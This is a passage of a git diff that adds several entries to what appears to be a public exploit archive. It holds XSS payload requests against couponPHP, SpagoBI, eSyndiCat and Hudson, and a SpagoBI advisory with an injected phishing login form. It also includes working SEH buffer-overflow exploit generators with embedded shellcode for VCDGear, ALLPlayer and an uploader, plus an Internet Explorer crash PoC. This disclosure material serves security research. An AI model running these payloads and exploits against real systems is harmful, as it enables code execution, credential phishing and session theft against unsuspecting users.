+Content-Type: text/html; charset=UTF-8
+
+You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 #277
+
+-----------------------
+
+
+
+Reflected and Persistent XSS:
+------------------------------
+
+http://localhost/admin/ajax/comments_paginate.php?sEcho=1"><script>alert(1);</script> (Reflected, GET)
+http://localhost/admin/ajax/stores_paginate.php?sEcho=1"><script>alert(1);</script> (Reflected, GET)
+
+
+http://localhost/admin/index.php (Persistent, POST)
+- thumbnail=store_8f08c534d509e7dd8a19906a0c0622a5.jpg&title=Testing101&domain=kakodane&description=kakodane2&affiliate_url=kakodane"><script>alert(1)</script>&seo%5Btitle%5D=&seo%5Bkeywords%5D=&seo%5Bdescription%5D=&seo%5Bheading%5D=&categories%5B%5D=3&categories%5B%5D=17&categories%5B%5D=35&categories%5B%5D=47&menu=stores_new&add_store=Add+store
+
+
+http://localhost/admin/index.php (Persistent, POST)
+- thumbnail=store_8f08c534d509e7dd8a19906a0c0622a5.jpg&title=Testing101&domain=kakodane&description=kakodane<script>alert(1)</script>&affiliate_url=kakodane3&seo%5Btitle%5D=&seo%5Bkeywords%5D=&seo%5Bdescription%5D=&seo%5Bheading%5D=&categories%5B%5D=3&categories%5B%5D=17&categories%5B%5D=35&categories%5B%5D=47&menu=stores_new&add_store=Add+store
+
+
+http://localhost/admin/index.php (Persistent, POST)
+- thumbnail=store_8f08c534d509e7dd8a19906a0c0622a5.jpg&title=Testing101&domain=kakodane"><script>alert(1)</script>&description=kakodane2&affiliate_url=kakodane3&seo%5Btitle%5D=&seo%5Bkeywords%5D=&seo%5Bdescription%5D=&seo%5Bheading%5D=&categories%5B%5D=3&categories%5B%5D=17&categories%5B%5D=35&categories%5B%5D=47&menu=stores_new&add_store=Add+store
+
+
+http://localhost/admin/index.php (Persistent, POST)
+- thumbnail=store_8f08c534d509e7dd8a19906a0c0622a5.jpg&title=Testing101&domain=kakodane&description=kakodane2&affiliate_url=kakodane3&seo%5Btitle%5D=&seo%5Bkeywords%5D=&seo%5Bdescription%5D=<script>alert(1)</script>&seo%5Bheading%5D=&categories%5B%5D=3&categories%5B%5D=17&categories%5B%5D=35&categories%5B%5D=47&menu=stores_new&add_store=Add+store
+
+
+http://localhost/admin/index.php (Persistent, POST)
+- thumbnail=store_8f08c534d509e7dd8a19906a0c0622a5.jpg&title=Testing101&domain=kakodane&description=kakodane2&affiliate_url=kakodane3&seo%5Btitle%5D=&seo%5Bkeywords%5D=&seo%5Bdescription%5D=&seo%5Bheading%5D="><script>alert(1);</script>&categories%5B%5D=3&categories%5B%5D=17&categories%5B%5D=35&categories%5B%5D=47&menu=stores_new&add_store=Add+store
+
+
+http://localhost/admin/index.php (Persistent, POST)
+- thumbnail=store_8f08c534d509e7dd8a19906a0c0622a5.jpg&title=Testing101&domain=kakodane&description=kakodane2&affiliate_url=kakodane3&seo%5Btitle%5D=&seo%5Bkeywords%5D="><script>alert(1)</script>&seo%5Bdescription%5D=&seo%5Bheading%5D=&categories%5B%5D=3&categories%5B%5D=17&categories%5B%5D=35&categories%5B%5D=47&menu=stores_new&add_store=Add+store
+
+
+http://localhost/admin/index.php (Persistent, POST)
+- thumbnail=store_8f08c534d509e7dd8a19906a0c0622a5.jpg&title=Testing101&domain=kakodane&description=kakodane2&affiliate_url=kakodane3&seo%5Btitle%5D="><script>alert(1)</script>&seo%5Bkeywords%5D=&seo%5Bdescription%5D=&seo%5Bheading%5D=&categories%5B%5D=3&categories%5B%5D=17&categories%5B%5D=35&categories%5B%5D=47&menu=stores_new&add_store=Add+store
+
+
+http://localhost/admin/index.php (Persistent, POST)
+- setting%5Bsitename%5D=couponPHP"><script>alert(1)</script>&setting%5Blogo%5D=logo_e3c61f6eb1039f2b1f02301a7635b7af.jpg&setting%5Bperpage%5D=50&setting%5Ballow_submit%5D=on&menu=settings_general&setting_name=site&tab=1&save_setting=Save
+
+
+http://localhost/admin/index.php (Persistent, POST)
+- setting%5Bsitename%5D=couponPHP&setting%5Blogo%5D=logo_e3c61f6eb1039f2b1f02301a7635b7af.jpg&setting%5Bperpage%5D=50"><script>alert(1)</script>&setting%5Ballow_submit%5D=on&menu=settings_general&setting_name=site&tab=1&save_setting=Save
+
+
+http://localhost/admin/index.php (Persistent, POST)
+- setting%5Bsitename%5D=couponPHP&setting%5Blogo%5D=logo_e3c61f6eb1039f2b1f02301a7635b7af.jpg"><script>alert(1)</script>&setting%5Bperpage%5D=50&setting%5Ballow_submit%5D=on&menu=settings_general&setting_name=site&tab=1&save_setting=Save
diff --git a/platforms/php/webapps/32038.txt b/platforms/php/webapps/32038.txt
new file mode 100755
index 000000000..4ec468e93
--- /dev/null
+++ b/platforms/php/webapps/32038.txt
@@ -0,0 +1,122 @@
+###################################################
+01. ###  Advisory Information ###
+
+Title: Persistent Cross-Site Scripting (XSS) in SpagoBI
+Date published: 2014-03-01
+Date of last update: 2014-03-01
+Vendors contacted: Engineering Group
+Discovered by: Christian Catalano
+Severity: High
+
+
+02. ###  Vulnerability Information ###
+
+CVE reference: CVE-2013-6232
+CVSS v2 Base Score: 4
+CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N)
+Component/s: SpagoBI
+Class: Input Manipulation
+
+
+03. ### Introduction ###
+
+SpagoBI[1] is an Open Source Business Intelligence suite, belonging to 
+the free/open source SpagoWorld initiative, founded and supported by 
+Engineering Group[2].
+It offers a large range of analytical functions, a highly functional 
+semantic layer often absent in other open source platforms and projects, 
+and a respectable set of advanced data visualization features including 
+geospatial analytics.
+[3]SpagoBI is released under the Mozilla Public License, allowing its 
+commercial use.
+SpagoBI is hosted on OW2 Forge[4] managed by OW2 Consortium, an 
+independent open-source software community.
+
+[1] - http://www.spagobi.org
+[2] - http://www.eng.it
+[3] - 
+http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012
+[4] - http://forge.ow2.org/projects/spagobi
+
+
+04. ### Vulnerability Description ###
+
+SpagoBI contains a flaw that allows persistent cross-site scripting 
+(XSS) attacks. This flaw exists because the application does not 
+validate certain unspecified input before returning it to the user. This 
+may allow an attacker to create a specially crafted request that would 
+execute arbitrary script code in a user's browser within the trust 
+relationship between their browser and the server.
+
+
+05. ### Technical Description / Proof of Concept Code ###
+
+In execution page can be visible a toolbar with various icons useful for 
+the user to perform actions related to the document runs.
+The user can insert a note about the executed document.
+The note is associated to the document with relative parameters value 
+and to the user.
+It can be public or private, so public notes are visible to all users 
+while the private notes are visible only from the user creator.
+
+An attacker  (a SpagoBI malicious user with a restricted account ) can 
+insert a note with jasvascript code:
+
+<object data="javascript:alert('XSS')"></object>
+
+and save it in public mode.
+The code execution happens when the victim (an unaware user)  click on 
+annotate document detail.
+
+This is not the only way to add malicious code in the SpagoBI web app.
+
+
+06. ### Business Impact ###
+
+Exploitation of the vulnerability requires low privileged application 
+user account but low or medium user interaction.
+Successful exploitation of the vulnerability results in session 
+hijacking, client-side phishing, client-side external redirects or 
+malware loads and client-side manipulation of the vulnerable module context.
+
+
+07. ### Systems Affected ###
+
+This vulnerability was tested against: SpagoBI 4.0
+Older versions are probably affected too, but they were not checked.
+
+
+08. ### Vendor Information, Solutions and Workarounds ###
+
+This issue is fixed in SpagoBI v4.1, which can be downloaded from:
+
+http://forge.ow2.org/project/showfiles.php?group_id=204
+
+Fixed by vendor [verified]
+
+
+09. ### Credits ###
+
+This vulnerability has been discovered by:
+Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com
+
+
+10.  ### Vulnerability History ###
+
+October  08th, 2013: Vulnerability identification
+October  22th, 2013: Vendor notification to  [SpagoBI Team]
+November 05th, 2013: Vendor Response/Feedback  from  [SpagoBI Team]
+December 16th, 2013: Vendor Fix/Patch [SpagoBI Team]
+January  16th, 2014: Fix/Patch Verified
+March    01st, 2014: Vulnerability disclosure
+
+
+11. ### Disclaimer ###
+
+The information contained within this advisory is supplied "as-is" with
+no warranties or guarantees of fitness of use or otherwise.
+I accept no responsibility for any damage caused by the use or misuse of 
+this information.
+
+###################################################
+
diff --git a/platforms/php/webapps/32039.txt b/platforms/php/webapps/32039.txt
new file mode 100755
index 000000000..f1aec7bc6
--- /dev/null
+++ b/platforms/php/webapps/32039.txt
@@ -0,0 +1,120 @@
+###################################################
+
+01. ###  Advisory Information ###
+
+Title: Persistent HTML Script Insertion permits offsite-bound forms
+Date published: 2014-03-01
+Date of last update: 2014-03-01
+Vendors contacted: Engineering Group
+Discovered by: Christian Catalano
+Severity: Medium
+
+
+02. ###  Vulnerability Information ###
+
+CVE reference: CVE-2013-6233
+CVSS v2 Base Score: 4
+CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N)
+Component/s: SpagoBI
+Class: Input Manipulation
+
+
+03. ### Introduction ###
+
+SpagoBI[1] is an Open Source Business Intelligence suite, belonging to 
+the free/open source SpagoWorld initiative, founded and supported by 
+Engineering Group[2].
+It offers a large range of analytical functions, a highly functional 
+semantic layer often absent in other open source platforms and projects, 
+and a respectable set of advanced data visualization features including 
+geospatial analytics.
+[3]SpagoBI is released under the Mozilla Public License, allowing its 
+commercial use. SpagoBI is hosted on OW2 Forge[4] managed by OW2 
+Consortium, an independent open-source software community.
+
+[1] - http://www.spagobi.org
+[2] - http://www.eng.it
+[3] - 
+http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012
+[4] - http://forge.ow2.org/projects/spagobi
+
+
+04. ### Vulnerability Description ###
+
+SpagoBI contains a flaw that allows persistent  script insertion.
+This may allow a remote attacker to inject HTML code including forms 
+that load on a remote site, which can allow the attacker to conduct a 
+phishing attack on a user and capture their credentials.
+
+
+05. ### Technical Description / Proof of Concept Code ###
+
+The vulnerability is located in some SpagoBI input fields
+(e.g.'Description' input field from 'Short document metadata')
+
+To reproduce the vulnerability,  the attacker (a malicious user) can add 
+the malicious HTML script code:
+
+<form method="POST" action="http://server/login/login.php.">
+Username: <input type="text" name="username" size="15" /><br />
+Password: <input type="password" name="passwort" size="15" /><br />
+<div align="center">
+<p><input type="submit" value="Login" /></p>
+</div>
+</form>
+
+in 'Description' input field from 'Short document metadata' and click on 
+save button.
+The code execution happens when the victim (an unaware user)  click on 
+'Short document metadata'.
+
+This is not the only way to inject malicious HTML code in the SpagoBI 
+web app.
+
+
+06. ### Business Impact ###
+
+Exploitation of the vulnerability requires low privileged application 
+user account but low or medium user interaction.  Successful 
+exploitation of the vulnerability results in persistent  phishing and 
+persistent external redirects.
+
+
+07. ### Systems Affected ###
+
+This vulnerability was tested against: SpagoBI 4.0
+Older versions are probably affected too, but they were not checked.
+
+
+08. ### Vendor Information, Solutions and Workarounds ###
+
+This issue is fixed in SpagoBI v4.1, which can be downloaded from:
+http://forge.ow2.org/project/showfiles.php?group_id=204
+
+Fixed by vendor [verified]
+
+
+09. ### Credits ###
+
+This vulnerability has been discovered by:
+Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com
+
+
+10.  ### Vulnerability History ###
+
+October  08th, 2013: Vulnerability identification
+October  22th, 2013: Vendor notification to  [SpagoBI Team]
+November 05th, 2013: Vendor Response/Feedback  from  [SpagoBI Team]
+December 16th, 2013: Vendor Fix/Patch [SpagoBI Team]
+January  16th, 2014: Fix/Patch Verified
+March    01st, 2014: Vulnerability disclosure
+
+
+11. ### Disclaimer ###
+
+The information contained within this advisory is supplied "as-is" with
+no warranties or guarantees of fitness of use or otherwise.
+I accept no responsibility for any damage caused by the use or misuse of 
+this information.
+
+###################################################
diff --git a/platforms/php/webapps/32040.txt b/platforms/php/webapps/32040.txt
new file mode 100755
index 000000000..ba989e7b3
--- /dev/null
+++ b/platforms/php/webapps/32040.txt
@@ -0,0 +1,136 @@
+###################################################
+
+01. ###  Advisory Information ###
+
+Title: XSS File Upload
+Date published: 2014-03-01
+Date of last update: 2014-03-01
+Vendors contacted: Engineering Group
+Discovered by: Christian Catalano
+Severity: Medium
+
+
+02. ###  Vulnerability Information ###
+
+CVE reference: CVE-2013-6234
+CVSS v2 Base Score: 4
+CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N)
+Component/s: SpagoBI
+Class: Input Manipulation
+
+
+03. ### Introduction ###
+
+SpagoBI[1] is an Open Source Business Intelligence suite, belonging to 
+the free/open source SpagoWorld initiative, founded and supported by 
+Engineering Group[2].
+It offers a large range of analytical functions, a highly functional 
+semantic layer often absent in other open source platforms and projects, 
+and a respectable set of advanced data visualization features including 
+geospatial analytics.
+[3]SpagoBI is released under the Mozilla Public License, allowing its 
+commercial use. SpagoBI is hosted on OW2 Forge[4] managed by OW2 
+Consortium, an independent open-source software community.
+
+[1] - http://www.spagobi.org
+[2] - http://www.eng.it
+[3] - 
+http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012
+[4] - http://forge.ow2.org/projects/spagobi
+
+
+04. ### Vulnerability Description ###
+
+SpagoBI contains a flaw that may allow a remote attacker to execute 
+arbitrary code. This flaw exists because the application does not 
+restrict uploading for specific file types from Worksheet designer 
+function.
+This may allow a remote attacker to upload arbitrary files (e.g. .html 
+for XSS) that would execute arbitrary script code in a user's browser 
+within the trust relationship between their browser and the server or 
+more easily conduct more serious attacks.
+
+
+05. ### Technical Description / Proof of Concept Code ###
+
+An attacker  (a SpagoBI malicious user with a restricted account) can 
+upload a file from Worksheet designer function.
+
+To  reproduce the vulnerability follow the provided information and 
+steps below:
+
+- Using a browser log on to SpagoBI with restricted account (e.g. 
+Business User Account)
+- Go on:  Worksheet designer function
+- Click on: Image  and Choose image
+- Upload  malicious file and save it
+
+XSS Malicious File Upload  Attack  has been successfully completed!
+
+More details about SpagoBI Worksheet Engine and  Worksheet designer
+http://wiki.spagobi.org/xwiki/bin/view/spagobi_server/Worksheet#HWorksheetoverview
+
+(e.g. Malicious File:  xss.html)
+
+<!DOCTYPE html>
+<html>
+<head>
+<script>
+function myFunction()
+{alert("XSS");}
+</script>
+</head>
+<body>
+<input type="button" onclick="myFunction()" value="Show alert box">
+</body>
+</html>
+
+
+06. ### Business Impact ###
+
+Exploitation of the vulnerability requires low privileged application 
+user account but low or medium user interaction. Successful exploitation 
+of the vulnerability results in session hijacking, client-side phishing, 
+client-side external redirects or malware loads and client-side 
+manipulation of the vulnerable module context.
+
+
+07. ### Systems Affected ###
+
+This vulnerability was tested against: SpagoBI 4.0
+Older versions are probably affected too, but they were not checked.
+
+
+08. ### Vendor Information, Solutions and Workarounds ###
+
+This issue is fixed in SpagoBI v4.1, which can be downloaded from:
+http://forge.ow2.org/project/showfiles.php?group_id=204
+
+Fixed by vendor [verified]
+
+
+09. ### Credits ###
+
+This vulnerability has been discovered by:
+Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com
+
+
+10.  ### Vulnerability History ###
+
+October  09th, 2013: Vulnerability identification
+October  22th, 2013: Vendor notification to  [SpagoBI Team]
+November 05th, 2013: Vendor Response/Feedback  from  [SpagoBI Team]
+December 16th, 2013: Vendor Fix/Patch [SpagoBI Team]
+January  16th, 2014: Fix/Patch Verified
+March    01st, 2014: Vulnerability disclosure
+
+
+11. ### Disclaimer ###
+
+The information contained within this advisory is supplied "as-is" with
+no warranties or guarantees of fitness of use or otherwise.
+I accept no responsibility for any damage caused by the use or misuse of 
+this information.
+
+###################################################
+
diff --git a/platforms/php/webapps/32045.txt b/platforms/php/webapps/32045.txt
new file mode 100755
index 000000000..2357bdfde
--- /dev/null
+++ b/platforms/php/webapps/32045.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30178/info
+
+eSyndiCat is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+eSyndiCat Pro 2.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/register.php where username="><script>alert(12157312.477)</script>&email="><script>alert(12157312.477)</script>&password="><script>alert(12157312.477)</script>&password2="><script>alert(12157312.477)</script>&security_code="><script>alert(12157312.477)</script>&register="><script>alert(12157312.477)</script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/32047.txt b/platforms/php/webapps/32047.txt
new file mode 100755
index 000000000..e78a2e5f2
--- /dev/null
+++ b/platforms/php/webapps/32047.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30184/info
+
+Hudson is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Hudson 1.223 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/hudson/search/?q="><script>alert(1);</script> 
\ No newline at end of file
diff --git a/platforms/windows/local/31991.rb b/platforms/windows/local/31991.rb
new file mode 100755
index 000000000..07d389b0b
--- /dev/null
+++ b/platforms/windows/local/31991.rb
@@ -0,0 +1,66 @@
+#!/usr/bin/ruby
+
+'''
+# Author: Provensec www.provensec.com <advisories@provensec.com >
+# Tested on XP SP3 / Windows 7
+
+# Description: VCDGEAR 3.50 is prone to a stack-based buffer overflow
+vulnerability because the application fails to perform adequate
+boundary-checks on user-supplied input.
+# An attacker can exploit this issue to execute arbitrary code in the
+context of the application. Failed exploit attempts will result in a
+denial-of-service condition.
+# Application vendor: VCDGear 3.50 -
+http://www.vcdgear.com/files/vcdgear350.zip
+
+# 0x00499a1e : pop ecx # pop ebp # ret 0x0c | startnull {PAGE_EXECUTE_READ}
+[vcdgear.exe]
+# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
+# SEH record (nseh field) at 0x0012f7a4 overwritten with normal pattern :
+0x35744134 (offset 580), followed by 1416 bytes of cyclic data
+# Project1!ScandataFinalize+0x441:
+# 00452ff9 c6841553fdffff00 mov     byte ptr [ebp+edx-2ADh],0
+ss:0023:4112f660=??
+# 0:000> !exchain
+# 0012f7a4: 44434241
+# Invalid exception stack at 909006eb
+# 0:000> !exploitable
+# *** ERROR: Symbol file could not be found.  Defaulted to export symbols
+for C:\WINDOWS\system32\USER32.dll -
+# *** ERROR: Symbol file could not be found.  Defaulted to export symbols
+for C:\WINDOWS\system32\kernel32.dll -
+# Exploitability Classification: EXPLOITABLE
+'''
+
+shellcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4" +
+"\x0d\x2b\xba\x83\xeb\xfc\xe2\xf4\x58\xe5\x6f\xba\xa4\x0d\xa0\xff" +
+"\x98\x86\x57\xbf\xdc\x0c\xc4\x31\xeb\x15\xa0\xe5\x84\x0c\xc0\xf3" +
+"\x2f\x39\xa0\xbb\x4a\x3c\xeb\x23\x08\x89\xeb\xce\xa3\xcc\xe1\xb7" +
+"\xa5\xcf\xc0\x4e\x9f\x59\x0f\xbe\xd1\xe8\xa0\xe5\x80\x0c\xc0\xdc" +
+"\x2f\x01\x60\x31\xfb\x11\x2a\x51\x2f\x11\xa0\xbb\x4f\x84\x77\x9e" +
+"\xa0\xce\x1a\x7a\xc0\x86\x6b\x8a\x21\xcd\x53\xb6\x2f\x4d\x27\x31" +
+"\xd4\x11\x86\x31\xcc\x05\xc0\xb3\x2f\x8d\x9b\xba\xa4\x0d\xa0\xd2" +
+"\x98\x52\x1a\x4c\xc4\x5b\xa2\x42\x27\xcd\x50\xea\xcc\xfd\xa1\xbe" +
+"\xfb\x65\xb3\x44\x2e\x03\x7c\x45\x43\x6e\x4a\xd6\xc7\x0d\x2b\xba"
+
+filename = "file.cue"
+header = " BINARY\n"
+header += " TRACK 01 MODE2\2352\n"
+header += " INDEX 01 00:00:00\n"
+
+nops = "\x90" * 20
+junk = "\x41" * 324
+nseh = "\xeb\x06\x90\x90"
+seh = "\x1e\x9a\x49\x00"
+padding = "D" * (1412-(nops.length+shellcode.length))
+
+data = "FILE \"" + junk + nseh + "ABCD" + nops + shellcode + padding + "\"" + header
+
+puts "[*] JUNK size: %i\n" % [junk.length]
+puts "[*] SHELLCODE size: %i\n" % [shellcode.length]
+puts "[*] PADDING size: %i" % [padding.length]
+
+File.open(filename, 'wb') do |fd|
+  fd.write data
+  puts "[*] FILE CREATED SUCCESSFULLY"
+end
diff --git a/platforms/windows/local/32041.pl b/platforms/windows/local/32041.pl
new file mode 100755
index 000000000..92ad838d6
--- /dev/null
+++ b/platforms/windows/local/32041.pl
@@ -0,0 +1,64 @@
+?#-----------------------------------------------------------------------------#
+# Exploit Title: ALLPlayer 5.8.1 - (.m3u) Buffer Overflow (SEH)               #
+# Date: Mar 1 2014                                                            #
+# Exploit Author: Gabor Seljan                                                #
+# Software Link: http://www.allplayer.org/download/allplayer                  #
+# Version: 5.8.1                                                              #
+# Tested on: Windows 7 SP1                                                    #
+#-----------------------------------------------------------------------------#
+
+# This application is still vulnerable to a buffer overflow, caused by improper
+# bounds checking of an URL given via menu or placed inside an M3U file.
+# 
+# Credit to previous exploits:
+#   + http://www.exploit-db.com/exploits/29798/ by Mike Czumak
+#   + http://www.exploit-db.com/exploits/28855/ by metacom
+
+#!/usr/bin/perl
+
+use strict;
+use warnings;
+
+my $filename = "sploit.m3u";
+
+my $junk1 = "\x41" x 301;   # Offset to SEH
+my $nSEH  = "\x61\x50";     # POPAD # Venetian padding
+my $SEH   = "\x50\x45";     # POP POP RET from ALLPlayer.exe
+my $junk2 = "\x42" x 700;
+ 
+my $align = "\x53".         # PUSH EBX
+            "\x6e".         # Venetian padding
+            "\x58".         # POP EAX
+            "\x6e".         # Venetian padding
+            "\x05\x14\x11". # ADD EAX,0x11001400
+            "\x6e".         # Venetian padding
+            "\x2d\x13\x11". # SUB EAX,0x11001300
+            "\x6e".         # Venetian padding
+            "\x50".         # PUSH EAX
+            "\x6e".         # Venetian padding
+            "\xc3";         # RET
+
+my $nops = "\x71" x 109;
+
+# msfpayload windows/exec cmd=calc.exe R
+# msfencode -e x86/unicode_mixed BufferRegister=EAX
+my $shellcode = "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAh".
+"AAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLyXTI9pKPip".
+"S02iwuP1z2RDRkb2nP2kNrjlDKnrN4BkD2NHJofWPJLfNQyonQGPDlmloqSLyrNLmPy16ozmYqY7".
+"JBzPB2R72kqBLPrkMrmlZaj0Bka0d83UGP1dOZYqvpb04Ka8mH4KR8kpYqyCHcMlQ9DKmdDKM18V".
+"nQyolqEpdl91FojmzahGNXk01eYd9s3M8xMk1mmTbUYRr8dKNxldKQWcRFRklLpKBkaHKl9qwc2k".
+"itRk9qFp3Yq4O4mT1K1Ks1aI0Zb1KOGpR8QOPZrkMBJKTFqMRJkQBm3UgIipYpypNp38matKpoe7".
+"ioyE7KJP85vBQF0heVCeEm3mio7eMlYvsLiz3PikiP45ze7KPGJs1bpoBJKP0SkOiEqSaQBL33ln".
+"s5sH2E9pAA";
+ 
+my $sploit = $junk1.$nSEH.$SEH.$align.$nops.$shellcode.$junk2;
+
+open(FILE, ">$filename") || die "[-]Error:\n$!\n";
+print FILE "http://$sploit";
+close(FILE);
+
+print "\nExploit file created successfully [$filename]!\n\n";
+print "You can either:\n";
+print "\t1. Open the created $filename file directly with ALLPlayer\n";
+print "\t2. Open the crafted URL via menu by Open movie/sound -> Open URL\n\n";
+print "http://$sploit\n";
diff --git a/platforms/windows/local/32050.py b/platforms/windows/local/32050.py
new file mode 100755
index 000000000..61581694f
--- /dev/null
+++ b/platforms/windows/local/32050.py
@@ -0,0 +1,38 @@
+#exploit por Daniel - La Calavera
+#Email: Lacalavera@gmail.com
+# Para CracksLatinoS
+
+#relleno
+
+rell = "\x41"* 477
+rell1 = "\x42"* 4000
+
+head = "\x41"* 8
+head += "\x0d\x0a\x31\x0d\x0a"
+head1 = "\x0d\x0a"
+head2 = "170.1.1.0"
+head2 +="\x0d\x0a"
+head2 +="\x22"
+head2 += "C:\Archivos2de2programa\Uploader!\Uploader!23151EXE"
+head2 +="\x22"
+
+
+# shellcode para calc.exe
+
+shellcode = "\x33\xD2\xB2\x50\x80\xF2\x55\x52\xC6\x45"
+shellcode += "\x31\x63\xC6\x45\x32\x61\xC6\x45\x33\x6C"
+shellcode += "\xC6\x45\x34\x63\xC6\x45\x35\x2E\xC6\x45\x36\x65"
+shellcode += "\xC6\x45\x37\x78\xC6\x45\x38\x65\x88\x45"
+shellcode += "\x39\x8D\x45\x31\x50\xB9\x31\x75\x66\x31"
+shellcode += "\x81\xF1\x69\x4D\x26\x31\xFF\xe1"
+
+# Next SHE
+Nshe = "\xeb\x06\x90\x90"
+# POP POP RETN
+PPR = "\x38\xbf\x40\x00"
+
+explo = (head + rell + Nshe + PPR + shellcode + rell1 + head1 + head2)
+arch = open ("uploadpref.dat", "w")
+
+arch.write(explo)
+arch.close
diff --git a/platforms/windows/remote/32049.txt b/platforms/windows/remote/32049.txt
new file mode 100755
index 000000000..517949c68
--- /dev/null
+++ b/platforms/windows/remote/32049.txt
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/30219/info
+
+Microsoft Internet Explorer is prone to a remote memory-corruption vulnerability.
+
+Remote attackers can exploit this issue to crash the affected application, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
+
+<script>
+
+for(i=0;i<33;i++){
+
+   try{ 
+
+   foo = new ActiveXObject("OutlookExpress.AddressBook").concat('3'+'3'+'3'); 
+
+   }catch(e){}
+
+}
+
+</script>
\ No newline at end of file